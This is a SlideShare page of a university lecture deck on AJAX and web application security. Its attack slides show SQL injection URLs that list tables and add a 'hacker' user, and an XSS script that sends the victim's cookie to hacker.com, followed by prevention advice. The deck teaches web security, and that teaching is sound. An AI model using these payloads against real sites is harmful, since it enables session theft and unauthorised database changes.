SlideShare a Scribd company logo

Day8

Download as PPTX, PDF
M
madamewoolf
EducationTechnology
1 of 18
CSE 136 - Lecture 8  AJAX  Presentation Layer Security  Lab
AJAX - what & why?  Asynchronous Javascript and XML  Why? Improve performance  To avoid postback - saves page re-loading time  Transfer smaller amount of data across network  Example: select year, make, model
AJAX - flow
Ajax - postback vs callback
Ajax - ASP.NET Ajax Architecture
Web Attack - Resource Enumeration  Common Files  test.txt  back.zip  upload.zip  passwords.txt  users.txt  checkout.aspx.bak  checkout.asp.old  Common Directories  /admin  /reports  /test  /upload  /temp  /include  /logs
Web Attack - Parameter manipulation  /student/details/1000  change to 1001?  SQL Injection  query = "select product_name from product where product_id=" + PID  PID comes from web parameter:  http://myweb.com/product.aspx?PID=1  http://myweb.com/product.aspx?PID=1;union select name from sysobjects where xtype='U'  Hackers add himself to the Users table  http://myweb.com/product.aspx?PID=1; insert into Users (uname, pword) values ('hacker', 'hacked')
Web Attack – cross site scripting (XSS)  Once you comprise the database, insert javascript into the tables  product.description = ,'<script>document.location='http://hacker.com/collect or.html? cookie='+document.cookie</script>  Hacker now knows your cookie when the content is rendered.  Danger of cross site scripting  Contents of the current document cookie is sent off to hacker.com  Session IDs and authentication tokens are commonly stored in cookies  Javascript can log key strokes
Web Attack - Prevention  Remove all SQL Injection code  HTML-Encode all data displayed to prevent XSS  Treat any input as potential threat  user can enter javascript in textbox and textarea  Use validation on the server (user could disable javascript error checking on browser)  Encrypt cookies  user_id="100" // No  user_id="CQZJU-VQRQF-LAWFI-HGCPL-MTNTS- JYOPD-TIJYV-INMYJ-TVLLC-RWJOT-CTHAM-GJQHD"  Upload Files:  Email attachment  Business documents  Servers should run Virus checker on all uploaded files
Web Attack and AJAX  The methods of a Web service are analogous to the form inputs of a Web application.  They are easy to find, easy to attack  WSDL is now open to public (example data often provided)
Web Attack - Traditional vs AJAX
Web Attack - white vs. black Exposed BL domain model
Web Attack - Ajax security mistakes Solution: Use cookie at the WEB web-service
Web Attack - Securing Ajax server  Install validation filter  Use Regular Expression to validate input strings  Use Regular Expression to remove "attack" characters: < & />, etc  Validate user thru cookies/sessions (WEB web-services)
Review question  Is ajax synchronous or asynchronous?  Why used ajax?  Is ajax architecture more secured or less?  What is XSS?  Difference between white box and black box?
Your assignment  Complete your MVC project with test cases  Project due next Thursday
Lab  Due: Grade your middle tier and test cases
References  .NET : Architecting Applications for the Enterprise  Ajax Security

Recommended

Day6
Day6Day6
Day6madamewoolf
 
Day2
Day2Day2
Day2madamewoolf
 
Day7
Day7Day7
Day7madamewoolf
 
Day1
Day1Day1
Day1madamewoolf
 
Day4
Day4Day4
Day4madamewoolf
 
CloudConnect 2011 - Building Highly Scalable Java Applications on Windows Azure
CloudConnect 2011 - Building Highly Scalable Java Applications on Windows AzureCloudConnect 2011 - Building Highly Scalable Java Applications on Windows Azure
CloudConnect 2011 - Building Highly Scalable Java Applications on Windows AzureDavid Chou
 
Microsoft Data Access Technologies
Microsoft Data Access TechnologiesMicrosoft Data Access Technologies
Microsoft Data Access TechnologiesDavid Chou
 
Java on Windows Azure
Java on Windows AzureJava on Windows Azure
Java on Windows AzureDavid Chou
 

Recommended

Day6
Day6Day6
Day6madamewoolf
 
Day2
Day2Day2
Day2madamewoolf
 
Day7
Day7Day7
Day7madamewoolf
 
Day1
Day1Day1
Day1madamewoolf
 
Day4
Day4Day4
Day4madamewoolf
 
CloudConnect 2011 - Building Highly Scalable Java Applications on Windows Azure
CloudConnect 2011 - Building Highly Scalable Java Applications on Windows AzureCloudConnect 2011 - Building Highly Scalable Java Applications on Windows Azure
CloudConnect 2011 - Building Highly Scalable Java Applications on Windows AzureDavid Chou
 
Microsoft Data Access Technologies
Microsoft Data Access TechnologiesMicrosoft Data Access Technologies
Microsoft Data Access TechnologiesDavid Chou
 
Java on Windows Azure
Java on Windows AzureJava on Windows Azure
Java on Windows AzureDavid Chou
 
Microsoft SQL Server 2008
Microsoft SQL Server 2008Microsoft SQL Server 2008
Microsoft SQL Server 2008Hossein Zahed
 
Entity Framework Overview
Entity Framework OverviewEntity Framework Overview
Entity Framework Overviewukdpe
 
Web apps architecture
Web apps architectureWeb apps architecture
Web apps architectureTanmoy Barman
 
Windows Azure AppFabric
Windows Azure AppFabricWindows Azure AppFabric
Windows Azure AppFabricDavid Chou
 
MVC Pattern. Flex implementation of MVC
MVC Pattern. Flex implementation of MVCMVC Pattern. Flex implementation of MVC
MVC Pattern. Flex implementation of MVCAnton Krasnoshchok
 
Microsoft Database Options
Microsoft Database OptionsMicrosoft Database Options
Microsoft Database OptionsDavid Chou
 
Enterprise Software Architecture
Enterprise Software ArchitectureEnterprise Software Architecture
Enterprise Software Architecturerahmed_sct
 
NServicebus WCF Integration 101
NServicebus WCF Integration 101NServicebus WCF Integration 101
NServicebus WCF Integration 101Rich Helton
 
Overview Of Xaware
Overview Of XawareOverview Of Xaware
Overview Of Xawareghessler
 
DOSUG Tech Overview of XAware
DOSUG Tech Overview of XAwareDOSUG Tech Overview of XAware
DOSUG Tech Overview of XAwareMatthew McCullough
 
Weblogic OnlineTraining | Weblogic Training Online | weblogic online training
Weblogic OnlineTraining | Weblogic Training Online | weblogic online trainingWeblogic OnlineTraining | Weblogic Training Online | weblogic online training
Weblogic OnlineTraining | Weblogic Training Online | weblogic online trainingEvanta Technologies
 
Java database connectivity
Java database connectivityJava database connectivity
Java database connectivityVaishali Modi
 
Multi-tenancy in Java
Multi-tenancy in JavaMulti-tenancy in Java
Multi-tenancy in Javaseges
 
Session And Cookies In Servlets - Java
Session And Cookies In Servlets - JavaSession And Cookies In Servlets - Java
Session And Cookies In Servlets - JavaJainamParikh3
 
Jdbc
JdbcJdbc
JdbcMumbai Academisc
 
Jdbc
JdbcJdbc
Jdbcleminhvuong
 
Oracle WorkManager
Oracle WorkManagerOracle WorkManager
Oracle WorkManagerGiampiero Cerroni
 
Jdbc in servlets
Jdbc in servletsJdbc in servlets
Jdbc in servletsNuha Noor
 
JDBC in Servlets
JDBC in ServletsJDBC in Servlets
JDBC in ServletsEleonora Ciceri
 
Database and Java Database Connectivity
Database and Java Database ConnectivityDatabase and Java Database Connectivity
Database and Java Database ConnectivityGary Yeh
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingDilan Warnakulasooriya
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & DefenseBlueinfy Solutions
 

More Related Content

What's hot

Microsoft SQL Server 2008
Microsoft SQL Server 2008Microsoft SQL Server 2008
Microsoft SQL Server 2008Hossein Zahed
 
Entity Framework Overview
Entity Framework OverviewEntity Framework Overview
Entity Framework Overviewukdpe
 
Web apps architecture
Web apps architectureWeb apps architecture
Web apps architectureTanmoy Barman
 
Windows Azure AppFabric
Windows Azure AppFabricWindows Azure AppFabric
Windows Azure AppFabricDavid Chou
 
MVC Pattern. Flex implementation of MVC
MVC Pattern. Flex implementation of MVCMVC Pattern. Flex implementation of MVC
MVC Pattern. Flex implementation of MVCAnton Krasnoshchok
 
Microsoft Database Options
Microsoft Database OptionsMicrosoft Database Options
Microsoft Database OptionsDavid Chou
 
Enterprise Software Architecture
Enterprise Software ArchitectureEnterprise Software Architecture
Enterprise Software Architecturerahmed_sct
 
NServicebus WCF Integration 101
NServicebus WCF Integration 101NServicebus WCF Integration 101
NServicebus WCF Integration 101Rich Helton
 
Overview Of Xaware
Overview Of XawareOverview Of Xaware
Overview Of Xawareghessler
 
Weblogic OnlineTraining | Weblogic Training Online | weblogic online training
Weblogic OnlineTraining | Weblogic Training Online | weblogic online trainingWeblogic OnlineTraining | Weblogic Training Online | weblogic online training
Weblogic OnlineTraining | Weblogic Training Online | weblogic online trainingEvanta Technologies
 
Java database connectivity
Java database connectivityJava database connectivity
Java database connectivityVaishali Modi
 
Multi-tenancy in Java
Multi-tenancy in JavaMulti-tenancy in Java
Multi-tenancy in Javaseges
 
Session And Cookies In Servlets - Java
Session And Cookies In Servlets - JavaSession And Cookies In Servlets - Java
Session And Cookies In Servlets - JavaJainamParikh3
 
Jdbc in servlets
Jdbc in servletsJdbc in servlets
Jdbc in servletsNuha Noor
 
Database and Java Database Connectivity
Database and Java Database ConnectivityDatabase and Java Database Connectivity
Database and Java Database ConnectivityGary Yeh
 

What's hot (20)

Microsoft SQL Server 2008
Microsoft SQL Server 2008Microsoft SQL Server 2008
Microsoft SQL Server 2008
 
Entity Framework Overview
Entity Framework OverviewEntity Framework Overview
Entity Framework Overview
 
Web apps architecture
Web apps architectureWeb apps architecture
Web apps architecture
 
Windows Azure AppFabric
Windows Azure AppFabricWindows Azure AppFabric
Windows Azure AppFabric
 
MVC Pattern. Flex implementation of MVC
MVC Pattern. Flex implementation of MVCMVC Pattern. Flex implementation of MVC
MVC Pattern. Flex implementation of MVC
 
Microsoft Database Options
Microsoft Database OptionsMicrosoft Database Options
Microsoft Database Options
 
Enterprise Software Architecture
Enterprise Software ArchitectureEnterprise Software Architecture
Enterprise Software Architecture
 
NServicebus WCF Integration 101
NServicebus WCF Integration 101NServicebus WCF Integration 101
NServicebus WCF Integration 101
 
Overview Of Xaware
Overview Of XawareOverview Of Xaware
Overview Of Xaware
 
DOSUG Tech Overview of XAware
DOSUG Tech Overview of XAwareDOSUG Tech Overview of XAware
DOSUG Tech Overview of XAware
 
Weblogic OnlineTraining | Weblogic Training Online | weblogic online training
Weblogic OnlineTraining | Weblogic Training Online | weblogic online trainingWeblogic OnlineTraining | Weblogic Training Online | weblogic online training
Weblogic OnlineTraining | Weblogic Training Online | weblogic online training
 
Java database connectivity
Java database connectivityJava database connectivity
Java database connectivity
 
Multi-tenancy in Java
Multi-tenancy in JavaMulti-tenancy in Java
Multi-tenancy in Java
 
Session And Cookies In Servlets - Java
Session And Cookies In Servlets - JavaSession And Cookies In Servlets - Java
Session And Cookies In Servlets - Java
 
Jdbc
JdbcJdbc
Jdbc
 
Jdbc
JdbcJdbc
Jdbc
 
Oracle WorkManager
Oracle WorkManagerOracle WorkManager
Oracle WorkManager
 
Jdbc in servlets
Jdbc in servletsJdbc in servlets
Jdbc in servlets
 
JDBC in Servlets
JDBC in ServletsJDBC in Servlets
JDBC in Servlets
 
Database and Java Database Connectivity
Database and Java Database ConnectivityDatabase and Java Database Connectivity
Database and Java Database Connectivity
 

Similar to Day8

OWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
OWASP ESAPI and Microsoft Web Libraries in Cross-Site ScriptingOWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
OWASP ESAPI and Microsoft Web Libraries in Cross-Site ScriptingDenim Group
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfacesmichelemanzotti
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Shreeraj Shah
 
AJAX: How to Divert Threats
AJAX: How to Divert ThreatsAJAX: How to Divert Threats
AJAX: How to Divert ThreatsCenzic
 
How to build a Citrix infrastructure on AWS
How to build a Citrix infrastructure on AWSHow to build a Citrix infrastructure on AWS
How to build a Citrix infrastructure on AWSDenis Gundarev
 
[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automationOWASP
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
The complete ASP.NET (IIS) Tutorial with code example in power point slide show
The complete ASP.NET (IIS) Tutorial with code example in power point slide showThe complete ASP.NET (IIS) Tutorial with code example in power point slide show
The complete ASP.NET (IIS) Tutorial with code example in power point slide showSubhas Malik
 
Scaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersScaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersoazabir
 
Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730chadtindel
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 
Hacking 101 (Session 2)
Hacking 101 (Session 2)Hacking 101 (Session 2)
Hacking 101 (Session 2)Nitroxis Sprl
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxjohnpragasam1
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxazida3
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxcgt38842
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesShreeraj Shah
 
Web Vulnerabilities_NGAN Seok Chern
Web Vulnerabilities_NGAN Seok ChernWeb Vulnerabilities_NGAN Seok Chern
Web Vulnerabilities_NGAN Seok ChernQuek Lilian
 

Similar to Day8 (20)

Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
 
OWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
OWASP ESAPI and Microsoft Web Libraries in Cross-Site ScriptingOWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
OWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
 
AJAX: How to Divert Threats
AJAX: How to Divert ThreatsAJAX: How to Divert Threats
AJAX: How to Divert Threats
 
How to build a Citrix infrastructure on AWS
How to build a Citrix infrastructure on AWSHow to build a Citrix infrastructure on AWS
How to build a Citrix infrastructure on AWS
 
[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
The complete ASP.NET (IIS) Tutorial with code example in power point slide show
The complete ASP.NET (IIS) Tutorial with code example in power point slide showThe complete ASP.NET (IIS) Tutorial with code example in power point slide show
The complete ASP.NET (IIS) Tutorial with code example in power point slide show
 
Scaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersScaling asp.net websites to millions of users
Scaling asp.net websites to millions of users
 
Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730Prevoty NYC Java SIG 20150730
Prevoty NYC Java SIG 20150730
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
Hacking 101 (Session 2)
Hacking 101 (Session 2)Hacking 101 (Session 2)
Hacking 101 (Session 2)
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
 
Web Vulnerabilities_NGAN Seok Chern
Web Vulnerabilities_NGAN Seok ChernWeb Vulnerabilities_NGAN Seok Chern
Web Vulnerabilities_NGAN Seok Chern
 

Recently uploaded

social pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajansocial pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajanpragatimahajan3
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityGeoBlogs
 
Student login on Anyboli platform.helpin
Student login on Anyboli platform.helpinStudent login on Anyboli platform.helpin
Student login on Anyboli platform.helpinRaunakKeshri1
 
Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104misteraugie
 
Arihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfArihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfchloefrazer622
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)eniolaolutunde
 
CARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptxCARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptxGaneshChakor2
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdfQucHHunhnh
 
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...Sapna Thakur
 
Mastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionMastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionSafetyChain Software
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeThiyagu K
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactPECB
 
Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3JemimahLaneBuaron
 
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...EduSkills OECD
 
Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Celine George
 
Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptxOrganic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptxVS Mahajan Coaching Centre
 

Recently uploaded (20)

social pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajansocial pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajan
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activity
 
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptxINDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
 
Student login on Anyboli platform.helpin
Student login on Anyboli platform.helpinStudent login on Anyboli platform.helpin
Student login on Anyboli platform.helpin
 
Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104
 
Arihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfArihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdf
 
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)
 
CARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptxCARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptx
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
 
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
 
Mastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionMastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory Inspection
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and Mode
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global Impact
 
Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3
 
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
 
Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17
 
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
 
Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptxOrganic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
 
Advance Mobile Application Development class 07
Advance Mobile Application Development class 07Advance Mobile Application Development class 07
Advance Mobile Application Development class 07
 

Day8

  • 1. CSE 136 - Lecture 8  AJAX  Presentation Layer Security  Lab
  • 2. AJAX - what & why?  Asynchronous Javascript and XML  Why? Improve performance  To avoid postback - saves page re-loading time  Transfer smaller amount of data across network  Example: select year, make, model
  • 4. Ajax - postback vs callback
  • 5. Ajax - ASP.NET Ajax Architecture
  • 6. Web Attack - Resource Enumeration  Common Files  test.txt  back.zip  upload.zip  passwords.txt  users.txt  checkout.aspx.bak  checkout.asp.old  Common Directories  /admin  /reports  /test  /upload  /temp  /include  /logs
  • 7. Web Attack - Parameter manipulation  /student/details/1000  change to 1001?  SQL Injection  query = "select product_name from product where product_id=" + PID  PID comes from web parameter:  http://myweb.com/product.aspx?PID=1  http://myweb.com/product.aspx?PID=1;union select name from sysobjects where xtype='U'  Hackers add himself to the Users table  http://myweb.com/product.aspx?PID=1; insert into Users (uname, pword) values ('hacker', 'hacked')
  • 8. Web Attack – cross site scripting (XSS)  Once you comprise the database, insert javascript into the tables  product.description = ,'<script>document.location='http://hacker.com/collect or.html? cookie='+document.cookie</script>  Hacker now knows your cookie when the content is rendered.  Danger of cross site scripting  Contents of the current document cookie is sent off to hacker.com  Session IDs and authentication tokens are commonly stored in cookies  Javascript can log key strokes
  • 9. Web Attack - Prevention  Remove all SQL Injection code  HTML-Encode all data displayed to prevent XSS  Treat any input as potential threat  user can enter javascript in textbox and textarea  Use validation on the server (user could disable javascript error checking on browser)  Encrypt cookies  user_id="100" // No  user_id="CQZJU-VQRQF-LAWFI-HGCPL-MTNTS- JYOPD-TIJYV-INMYJ-TVLLC-RWJOT-CTHAM-GJQHD"  Upload Files:  Email attachment  Business documents  Servers should run Virus checker on all uploaded files
  • 10. Web Attack and AJAX  The methods of a Web service are analogous to the form inputs of a Web application.  They are easy to find, easy to attack  WSDL is now open to public (example data often provided)
  • 11. Web Attack - Traditional vs AJAX
  • 12. Web Attack - white vs. black Exposed BL domain model
  • 13. Web Attack - Ajax security mistakes Solution: Use cookie at the WEB web-service
  • 14. Web Attack - Securing Ajax server  Install validation filter  Use Regular Expression to validate input strings  Use Regular Expression to remove "attack" characters: < & />, etc  Validate user thru cookies/sessions (WEB web-services)
  • 15. Review question  Is ajax synchronous or asynchronous?  Why used ajax?  Is ajax architecture more secured or less?  What is XSS?  Difference between white box and black box?
  • 16. Your assignment  Complete your MVC project with test cases  Project due next Thursday
  • 17. Lab  Due: Grade your middle tier and test cases
  • 18. References  .NET : Architecting Applications for the Enterprise  Ajax Security